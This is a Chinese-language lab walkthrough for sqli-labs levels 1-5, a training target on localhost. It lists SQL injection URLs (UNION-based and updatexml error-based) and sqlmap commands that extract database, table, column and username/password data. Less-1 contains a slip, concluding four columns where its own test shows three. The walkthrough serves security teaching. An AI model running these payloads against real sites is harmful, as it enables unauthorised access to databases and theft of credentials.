sqli-labs(1-5)通关讲解
Less-1
方法一:手工注入
1.判断闭合
http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+ //正常
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+ //异常
2.判断字段数
http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+ //正常
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+ //异常
有四个字段
3.查看回显点
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
4.查看数据库
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+
5.查看表
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 --+
6.查看users表中列
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3 --+
7.查看users表中username,password的数据
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username,0x7e,password) from users),3 --+
方法二:工具注入
1.通过sqlmap工具查看库
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dbs
查看当前数据库
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --current-db
2.查看security中的表
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --tables -D security
3.查看users数据
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dump -D security -T users
Less-2
第二关为数字型注入,与第一关做法相同
方法一:手工注入
1.判断闭合
http://localhost/sqli-labs/Less-2/?id=1 and 1=1 --+ //正常
http://localhost/sqli-labs/Less-2/?id=1 and 1=2 --+ //异常
其余步骤与Less-1步骤一样,这里不做重复说明了
方法二:工具注入
与Less-1方法相同
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-2/?id=1" --batch --dump -D security -T users
Less-3
方法一:手工注入
1.判断闭合
http://localhost/sqli-labs/Less-3/?id=1') and 1=1 --+ //正常
http://localhost/sqli-labs/Less-3/?id=1') and 1=2 --+ //异常
2.判断字段数
http://localhost/sqli-labs/Less-3/?id=1') order by 3 --+
http://localhost/sqli-labs/Less-3/?id=1') order by 4 --+
3.查看回显点
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+
4.查看数据库
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,database(),3 --+
5.查看表
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
6.查看users表中字段
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users" --+
7.查看users表中数据
http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(username,0x7e,password),3 from users --+
方法二:工具注入
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-3/?id=1" --batch -D security -T users --dump
Less-4
方法一:手工注入
http://localhost/sqli-labs/Less-4/?id=1") and 1=1 --+ //正常
http://localhost/sqli-labs/Less-4/?id=1") and 1=2 --+ //异常
后面跟前三关步骤一样,参考Less-1和Less-2即可
方法二:工具注入
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-4/?id=1" --batch -D security -T users --dump
Less-5
方法一:手工注入
1.判断闭合
http://localhost/sqli-labs/Less-5/?id=1' and 1=1 --+ //正常
http://localhost/sqli-labs/Less-5/?id=1' and 1=2 --+ //异常
2.判断字段数
http://localhost/sqli-labs/Less-5/?id=1' order by 4 --+ //异常
http://localhost/sqli-labs/Less-5/?id=1' order by 3 --+ //正常
可判断3字段
3.判断回显点
因为没有回显点我们可试一下报错注入
4.报错注入–查数据库
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,database()),3)--+
5.查表
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema="security") )),3)--+
6.查users中的列名
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users") )),3)--+
7.查users中username,password中数据
http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(username,0x7e,password) from users) )),3)--+
可通过限制查询–limit 来逐一查看每组数据
方法二:工具注入
通过sqlmap可直接查出users表中数据至于具体操作可参照Less-1
python3 sqlmap.py -u "http://localhost/sqli-labs/Less-5/?id=1" --batch -D security -T users --dump
ps:后续教程会持续发布,尽情期待